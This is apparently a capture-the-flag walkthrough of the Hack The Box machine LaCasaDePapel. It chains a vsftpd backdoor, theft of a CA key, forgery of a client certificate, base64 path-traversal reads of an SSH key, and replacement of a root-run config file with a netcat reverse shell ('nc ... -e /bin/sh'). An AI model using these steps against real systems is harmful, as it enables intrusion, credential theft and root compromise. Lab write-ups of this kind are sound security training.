- Use an old FTP exploit to open a backdoor on the box that gives us a Psy Shell (a PHP REPL)
- Grab a CA key file off the box and a CA crt from the webpage
- Use the CA key file and CA crt file to generate a .p12 file and log into the webpage
- Use an LFI vulnerability to grab an SSH private key
- Use the private key to SSH in
- Replace the memcached.ini file with our own to spawn a reverse shell
First I start with an Nmap scan.
```
# Nmap 7.70 scan initiated Mon May 27 18:16:51 2019 as: nmap -sV -sC -T4 10.10.10.131
Nmap scan report for 10.10.10.131
Host is up (0.11s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE  VERSION
21/tcp  open  ftp      vsftpd 2.3.4
22/tcp  open  ssh      OpenSSH 7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 03:e1:c2:c9:79:1c:a6:6b:51:34:8d:7a:c3:c7:c8:50 (RSA)
|   256 41:e4:95:a3:39:0b:25:f9:da:de:be:6a:dc:59:48:6d (ECDSA)
|_  256 30:0b:c6:66:2b:8f:5e:4f:26:28:75:0e:f5:b1:71:e4 (ED25519)
80/tcp  open  http     Node.js (Express middleware)
|_http-title: La Casa De Papel
443/tcp open  ssl/http Node.js Express framework
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-title: La Casa De Papel
| ssl-cert: Subject: commonName=lacasadepapel.htb/organizationName=La Casa De Papel
| Not valid before: 2019-01-27T08:35:30
|_Not valid after:  2029-01-24T08:35:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|   http/1.1
|_  http/1.0
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 27 18:17:24 2019 -- 1 IP address (1 host up) scanned in 32.68 seconds
```
A few ports are open, but the one that piques my interest is FTP. I know for a fact that vsftpd 2.3.4 is vulnerable. I will use the Metasploit module exploit/unix/ftp/vsftpd_234_backdoor (v2.3.4 Backdoor Command Execution) for this.
```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic
```
The only thing I have to set is RHOSTS. Running the exploit, I see that it completed but no session was created.
```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.131
RHOSTS => 10.10.10.131
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.131:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.131:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
```
If I run the exploit a second time I get a different message. It says that the backdoor port is open but the service on it is not a shell, which most likely means it is not a bash shell.
```
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.131:21 - The port used by the backdoor bind listener is already open
[-] 10.10.10.131:21 - The service on port 6200 does not appear to be a shell
[*] Exploit completed, but no session was created.
```
Running an Nmap scan against port 6200 shows that the port is now open.
```
# nmap -p 6200 10.10.10.131
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-18 12:30 EDT
Nmap scan report for 10.10.10.131
Host is up (0.096s latency).

PORT     STATE SERVICE
6200/tcp open  lm-x

Nmap done: 1 IP address (1 host up) scanned in 0.79 seconds
```
I can use netcat to connect to the backdoor. Once in, I am greeted with a Psy Shell, which is an interactive PHP shell (REPL).
```
# nc -nv 10.10.10.131 6200
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Connected to 10.10.10.131:6200.
Psy Shell v0.9.9 (PHP 7.2.10 — cli) by Justin Hileman
```
To navigate this shell I need to use PHP functions. Listing the /home directory reveals several users.
```
scandir('/home');
=> [
     ".",
     "..",
     "berlin",
     "dali",
     "nairobi",
     "oslo",
     "professor",
   ]
```
If I list the contents of each user's home directory, I see a couple of things:
- The user flag is located in /home/berlin
- There is a ca.key file in /home/nairobi
```
scandir('/home/berlin');
=> [
     ".",
     "..",
     ".ash_history",
     ".ssh",
     "downloads",
     "node_modules",
     "server.js",
     "user.txt",
   ]

scandir('/home/dali');
=> [
     ".",
     "..",
     ".ash_history",
     ".config",
     ".qmail-default",
     ".ssh",
     "server.js",
   ]

scandir('/home/nairobi');
=> [
     ".",
     "..",
     "ca.key",
     "download.jade",
     "error.jade",
     "index.jade",
     "node_modules",
     "server.js",
     "static",
   ]

scandir('/home/oslo');
=> [
     ".",
     "..",
     "Maildir",
     "inbox.jade",
     "index.jade",
     "node_modules",
     "package-lock.json",
     "server.js",
     "static",
   ]
```
Seeing that ca.key made me want to check out port 443. Navigating to the web page confirmed my hunch: it asks for a client certificate before it will show the full site.
I copied the key to my host machine by reading the ca.key file in the Psy Shell and pasting the contents into an empty file.
```
readfile("/home/nairobi/ca.key");
-----BEGIN PRIVATE KEY-----
[key material omitted]
-----END PRIVATE KEY-----
```
The next step is to grab the .crt file from the web browser. In Firefox, navigate to Preferences > Privacy and Security > View Certificates. In the Authorities tab, scroll down until you see the certificate for lacasadepapelhtb.htb and export it to your host machine.
Now I need to create the client certificate. To do this I use openssl with the ca.key file and the lacasadepapelhtb.crt file. It will ask for an export password; just leave it blank.
```
# openssl pkcs12 -export -clcerts -in lacasadepapelhtb.crt -inkey ca.key -out lacasadepapel.p12
Enter Export Password:
Verifying - Enter Export Password:
```
Now I need to import lacasadepapel.p12 into Firefox. Go back to Preferences > Privacy and Security > View Certificates, but this time choose Your Certificates, then Import and select the .p12 file.
Now when I go back to the web page and refresh it, I no longer get the client certificate error.
Looking through all the .avi files I don't find anything, since they are all empty, but looking at the source code of the web page does reveal something interesting at the bottom. I see files served from a /file/ path whose names look base64-encoded. Using this I can do two things:
- Grab the user flag in /home/berlin
- Grab an ssh private key from /home/berlin/.ssh/id_rsa and log in with it
```
# echo -n "../../../../home/berlin/user.txt" | base64
Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vdXNlci50eHQ=
```

https://10.10.10.131/file/Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vdXNlci50eHQ=
Now I grab the SSH key the same way.
```
# echo -n "../../../../home/berlin/.ssh/id_rsa" | base64
Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E=
```

https://10.10.10.131/file/Li4vLi4vLi4vLi4vaG9tZS9iZXJsaW4vLnNzaC9pZF9yc2E=
My first thought was to SSH in as berlin, since that is where I found the key, but it didn't work. I tried the other users and it ended up working as professor.
```
# ssh -i id_rsa professor@10.10.10.131
[La Casa De Papel ASCII-art banner]
lacasadepapel [~]$
```
Doing some basic enumeration, all I found were a couple of files in the professor home directory, but I couldn't really make much of them. My next thought was to see what processes were running in the background; for that I use a tool called pspy. I needed to get the pspy executable onto the box, so I served it with Python's SimpleHTTPServer.
```
# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
```
Then I used wget from the professor account to download it into his home directory.
```
# wget 10.10.14.21/pspy64
Connecting to 10.10.14.21 (10.10.14.21:80)
pspy64               100% |************************************************|  4364k  0:00:00 ETA
```
Make the file executable and run it. After some time has passed you should see an interesting process.
```
2019/09/18 19:06:02 CMD: UID=0    PID=5962   | sudo -u nobody /usr/bin/node /home/professor/memcached.js
```
This process runs the same memcached.js file that sits in the professor's home directory.
```
# ls -la
total 4392
drwxr-sr-x    4 professo professo      4096 Sep 18 19:04 .
drwxr-xr-x    7 root     root          4096 Feb 16  2019 ..
lrwxrwxrwx    1 root     professo         9 Nov  6  2018 .ash_history -> /dev/null
drwx------    2 professo professo      4096 Jan 31  2019 .ssh
-rw-r--r--    1 root     root            88 Jan 29  2019 memcached.ini
-rw-r-----    1 root     nobody         434 Jan 29  2019 memcached.js
drwxr-sr-x    9 root     professo      4096 Jan 29  2019 node_modules
```
I can't read memcached.js, but I can read memcached.ini.
```
cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
```
This file contains the same command that the process is executing, which tells me that the cron job runs whatever command is in this file as root. My first thought was to edit memcached.ini and put a reverse shell in it to get root, but I saw that I don't have write permission on it. After some time had passed, I realized I needed to go back to basics: even though the file is owned by root, I can still delete it, because it sits in my own home directory. All I need to do is replace it with a file of my own with the same name to get a root shell.
```
# rm memcached.ini
rm: remove 'memcached.ini'? y
```
Make sure the new memcached.ini contains something like this:
```
[program:memcached]
command = nc 10.10.14.21 9000 -e /bin/sh
```
Now set up a nc listener and wait for the shell to connect back.
```
# nc -lvnp 9000
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 10.10.10.131.
Ncat: Connection from 10.10.10.131:33131.
whoami
root
```
So now I can grab the root flag.